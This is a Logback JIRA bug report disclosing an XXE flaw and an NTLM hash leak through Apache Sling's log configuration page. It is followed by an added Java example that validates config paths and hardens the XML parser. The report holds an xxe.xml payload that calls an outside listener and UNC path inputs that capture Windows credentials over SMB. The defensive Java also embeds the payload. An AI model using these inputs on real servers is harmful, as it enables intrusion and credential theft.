[logback-dev] [JIRA] (LOGBACK-1465) xxe and Information disclosure vulnerabilities in Logback

QOS.CH (JIRA) noreply-jira at qos.ch
Thu May 9 09:48:00 CEST 2019


shuiboye created LOGBACK-1465:
---------------------------------

             Summary: xxe and Information disclosure vulnerabilities in Logback
                 Key: LOGBACK-1465
                 URL: https://jira.qos.ch/browse/LOGBACK-1465
             Project: logback
          Issue Type: Bug
          Components: logback-core
         Environment: I tested Apache Sling latest version 11 integrating Logback, running on a Windows system
            Reporter: shuiboye
            Assignee: Logback dev list
            Priority: Critical
         Attachments: image-2019-05-09-15-41-28-419.png, image-2019-05-09-15-41-45-829.png, image-2019-05-09-15-43-09-668.png, image-2019-05-09-15-43-25-103.png

Hi, I found XXE and information disclosure vulnerabilities in Logback when testing Apache Sling latest version 11 integrating Logback.

First I log in to Sling as an admin.
*XXE*
The vulnerable URL is [http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the "Logback Config File" field, I input "\\192.168.0.102\c$\xxe.xml" as shown below.
!image-2019-05-09-15-43-09-668.png!
The content of xxe.xml in the c:\ directory on the server 192.168.0.102 is:
{quote}
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % sp SYSTEM "http://192.168.0.102:8090/sling">
%sp;
]>
{quote}
 
After clicking "save", the netcat running on the server 192.168.0.102 and listening on port 8090 receives the request as shown below.
!image-2019-05-09-15-43-25-103.png!
 
*Information disclosure (Windows username and NTLM password hash)*
The vulnerable URL is [http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
To ensure that the "Logback Config File" field can result in the server's Windows username and NTLM password hash being leaked to remote attackers through SMB, I use another machine to visit the vulnerable page, whose URL is also [http://192.168.0.102:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the "Logback Config File" field, I input "\\192.168.9.128\test". The IP 192.168.9.128 is another machine used to capture SMB.
!image-2019-05-09-15-41-28-419.png!
After clicking "save", the machine whose IP is 192.168.9.128 successfully captures the Windows username and NTLM password hash through SMB.
 
!image-2019-05-09-15-41-45-829.png!



--
This message was sent by Atlassian JIRA
(v7.3.1#73012)
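Both findings in the report hinge on the same root cause: a web-editable path is handed straight to the file and XML layers, so the server (a) follows a UNC path onto the network and authenticates over SMB, and (b) parses whatever XML it finds with external entities enabled. The following is an added example, not code from Logback, Apache Sling or the reporter, showing how such a field can be validated and how the file can be parsed with a hardened SAX configuration in Java. The class name, method names and the `conf` directory used as the only permitted location are assumptions for illustration; the embedded `xxe.xml` text is a copy of the payload quoted in the report, used here as test input for the parser.

```java
import java.io.StringReader;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

/**
 * Added example (not Logback's or Sling's code): two defensive checks for a
 * user-supplied "config file" setting, written against the two findings in
 * LOGBACK-1465. Class and method names are hypothetical.
 */
public class SafeConfigLoading {

    /** Copy of the xxe.xml payload quoted in the report, used as parser input. */
    static final String XXE_PAYLOAD =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE r [\n"
      + "<!ENTITY % sp SYSTEM \"http://192.168.0.102:8090/sling\">\n"
      + "%sp;\n"
      + "]>\n";

    /** Constructed harmless configuration document for comparison. */
    static final String BENIGN_CONFIG =
        "<?xml version=\"1.0\"?><configuration><root level=\"INFO\"/></configuration>";

    /**
     * Check 1: reject UNC paths (\\host\share, //host/share), URLs, and anything
     * that escapes the directory the application allows config files to live in.
     * The allowed directory is an assumption for this example.
     */
    static boolean isAllowedConfigPath(String userValue, Path allowedDir) {
        if (userValue == null || userValue.isEmpty()) return false;
        // A leading \\ or // is a UNC/network path on Windows. Resolving it makes the
        // JVM open an SMB connection and authenticate, which is the credential leak
        // described in the report, so refuse it before touching the file system.
        if (userValue.startsWith("\\\\") || userValue.startsWith("//")) return false;
        // Only plain local paths are acceptable; no URL schemes.
        if (userValue.contains("://")) return false;
        Path candidate;
        try {
            candidate = allowedDir.resolve(userValue).toAbsolutePath().normalize();
        } catch (InvalidPathException e) {
            return false;
        }
        // Containment check after normalisation also defeats ../ traversal and
        // absolute paths such as C:\xxe.xml, which resolve outside allowedDir.
        return candidate.startsWith(allowedDir.toAbsolutePath().normalize());
    }

    /**
     * Check 2: parse the XML with a SAX parser that forbids DOCTYPE declarations
     * and external entities, so a file like xxe.xml can never cause an outbound
     * request. Returns true if the document parsed, false if it was rejected.
     */
    static boolean parseHardened(String xml) {
        try {
            SAXParserFactory f = SAXParserFactory.newInstance();
            // Primary defence: no DTD at all means no entity declarations of any kind.
            f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            // Defence in depth for parsers that do not honour the feature above.
            f.setFeature("http://xml.org/sax/features/external-general-entities", false);
            f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            f.setXIncludeAware(false);
            SAXParser parser = f.newSAXParser();
            parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return true;
        } catch (SAXException e) {
            // With disallow-doctype-decl the parser raises SAXParseException on the
            // DOCTYPE line, before any entity could be resolved.
            return false;
        } catch (Exception e) {
            return false;
        }
    }

    public static void main(String[] args) {
        Path allowed = Paths.get("conf");   // assumed directory for config files
        System.out.println("UNC path allowed?     " + isAllowedConfigPath("\\\\192.168.9.128\\test", allowed));
        System.out.println("traversal allowed?    " + isAllowedConfigPath("../../etc/passwd", allowed));
        System.out.println("local file allowed?   " + isAllowedConfigPath("logback.xml", allowed));
        System.out.println("xxe.xml parsed?       " + parseHardened(XXE_PAYLOAD));
        System.out.println("benign config parsed? " + parseHardened(BENIGN_CONFIG));
    }
}
```

The path check runs before any file access, because the SMB authentication in the second finding happens as soon as the JVM opens the UNC path, not when the content is parsed. The parser check is independent of the path check and is worth applying even to files from a trusted directory, since the report shows that a DOCTYPE with an external parameter entity is enough to trigger a network request from the server.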